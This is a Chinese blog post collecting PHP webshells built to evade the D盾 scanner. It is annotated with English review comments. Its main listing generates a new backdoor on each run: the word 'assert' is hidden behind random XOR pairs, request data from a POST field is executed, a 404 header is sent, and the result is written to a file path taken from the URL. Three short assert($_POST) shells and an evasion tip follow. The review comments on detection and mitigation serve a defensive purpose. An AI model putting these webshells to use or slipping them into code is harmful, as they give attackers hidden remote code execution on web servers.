准备写一个长期更新的免杀webshell总结

2019-05-21

https://github.com/yzddmr6/php_xor_bypass

利用随机异或无限免杀D盾

<?php
//code by Mr6
// Turns off all PHP error reporting for the rest of this generator script.
error_reporting(0);
    /**
     * Builds a list of $length characters picked at random from a fixed pool
     * of punctuation and ASCII letters.
     *
     * The only caller in this listing uses the result as per-character XOR
     * key material.
     *
     * NOTE(review): $key is never initialised, so a $length of 0 returns an
     * undefined variable (null) instead of an empty array.
     * NOTE(review): the `$pattern{...}` string-offset form is rejected by
     * PHP 8, so this listing only parses on older interpreters.
     *
     * @param int $length Number of characters to generate.
     * @return array Single-character strings indexed 0..$length-1.
     */
    function randomkeys($length)   
{   
   $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    // pick one character at a random offset in the pool
    }   
    return $key;   
}   
    /**
     * Builds a string of $length random upper-case ASCII letters.
     *
     * The only caller in this listing uses the result as a class name and,
     * lower-cased and reversed, as a variable name in the emitted file.
     *
     * NOTE(review): $key starts out undefined; the `@` on the first append
     * hides the resulting notice. A $length of 0 returns an undefined
     * variable (null) rather than an empty string.
     *
     * @param int $length Number of letters to generate.
     * @return string Concatenated random letters.
     */
    function randname($length)   
{   
   $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    // append one letter from a random offset
    }   
    return $key;   
} 
    // Generator body: everything echoed below is the text of a second PHP
    // file. Three things vary per run: the six key characters, the 4-letter
    // class name, and the variable name derived from it (lower-cased and
    // reversed). Every other byte of the emitted file is constant.
    $str=randomkeys(6); 
    $bname=randname(4);
    $lname=strrev(strtolower($bname));
    // Fixed six-character target string. It is never echoed literally, only
    // as the XOR pairs produced in the loop below.
    $str2="assert";
            echo "<?php \n";
            // The emitted file always sends a 404 status line.
            echo "header('HTTP/1.1 404');\n";
            // Emitted class: one public property $c plus a destructor whose
            // body is filled in by the echo statements that follow.
            echo "class  ".$bname."{ public \$c='';\nfunction __destruct(){\n";
    for ($i=0;$i<6;$i++)
    {
        $name="_".$i;
        // XOR the key character with the target character and hex-encode
        // the one-byte result.
        $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
        // Emits  $_N='<key char>'^"\x<hex>";  which yields target character
        // N again when the emitted file runs.
        echo "$"."$name=";
    echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
    }
    // Emitted verbatim: joins $_0..$_5 into $db inside the destructor.
    $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
    echo $aa;
    echo "\n";
    // Emitted verbatim: calls the function named by $db with property $c as
    // a string, errors suppressed, then closes the destructor and the class.
    echo '@$db ("$this->c");}}';
    echo "\n";
    // Emitted: instantiates the class and copies the POST field 'Mr6' into
    // $c; the destructor then runs when the object is destroyed.
    echo "\${$lname}=new {$bname}();\n";
    echo "@\${$lname}->c=\$_POST['Mr6'];\n";
    echo "?>\n";
    // NOTE(review, detection): the keyword is hidden but the structure is
    // not. Each emitted file has the 404 header line, a class with a public
    // $c and a __destruct, six consecutive one-character XOR assignments to
    // $_0..$_5, their concatenation into a variable that is then called, and
    // a read of $_POST['Mr6'].
    // NOTE(review, exposure): PHP 7.1 disallowed dynamic calls to assert()
    // with a string argument and PHP 8.0 removed string evaluation from
    // assert() altogether; confirm against the interpreter version deployed.
    //
    // NOTE(review): the output path is taken from the query string without
    // any validation, so anyone who can reach this script chooses where the
    // web-server account writes.
    @$file=$_GET['file'];
    // NOTE(review): no ob_start() is visible in this listing, and
    // ob_get_contents() returns false unless output buffering is already
    // active, so what gets written depends on the server configuration.
    $html = ob_get_contents();
    if (isset($file)){
    if(file_put_contents($file,$html))
    // NOTE(review): $file is echoed back into the response unescaped.
    echo "\n\n\n".$file."   save success!";}
    else {echo "Please input the file name like '?file=xxx.txt'";}
    ?>

2019-05-11

<?php
/**
 * Returns the raw value of the POST field named "1".
 *
 * The assignment to the local $a has no effect beyond supplying the return
 * value. No validation or filtering is applied.
 * NOTE(review): raises an undefined-index notice/warning when the field is
 * absent from the request.
 *
 * @return mixed Unvalidated request data.
 */
function a(){
    return $a=$_POST['1'];
}
// Passes the unvalidated POST value returned by a() to assert(), with errors
// suppressed. On interpreters before PHP 8.0, a string argument to assert()
// is evaluated as PHP code while assertions are active, so this is
// request-driven code execution.
// NOTE(review, detection): the superglobal and assert() sit in different
// statements here, so a rule has to follow the value through the wrapper
// function rather than match both on one line.
// NOTE(review, mitigation): disabling assertions (zend.assertions on PHP 7)
// or running PHP 8+ removes the code-evaluation behaviour.
@assert(a());
?>

<?php
// Pre-declares $key and $value with a dummy string; the loop below then
// reuses the same two names for the request data.
$value=$key = "a";
// Iterates over every POST field, whatever its name.
foreach($_POST as $key=>$value){
    // Each field value is handed to assert(). On interpreters before PHP 8.0,
    // a string argument is evaluated as PHP code while assertions are active.
    // NOTE(review, detection): the value reaching assert() is tainted by the
    // foreach over $_POST regardless of the earlier dummy assignment; a rule
    // should not treat the prior constant assignment as sanitising it.
    assert($value);
}

<?php
// Builds the literal text  $_POSTasdasd[1]  by concatenation. This is only a
// string; no superglobal is read here.
$x='$_PO'."STasdasd[".'1]';
// NOTE(review): str_replace() is called with two arguments although it
// requires three. PHP 7 warns and returns null, so nothing is appended;
// PHP 8 throws ArgumentCountError.
$x = $x.str_replace('STasdasd',"ST[");

// The loop counter reuses the name $x, overwriting the string built above
// with the integer 0. The body runs exactly once.
for ($x=0; $x<=0; $x++) {
    // The argument is therefore the string "0". As written, this listing
    // never reads or evaluates request data; it only shows a variable being
    // redefined as a loop counter before reaching assert().
    assert("$x");
}

可以发现的规律是：当已经定义的变量和循环的变量名一致时，D盾就不是那么敏感了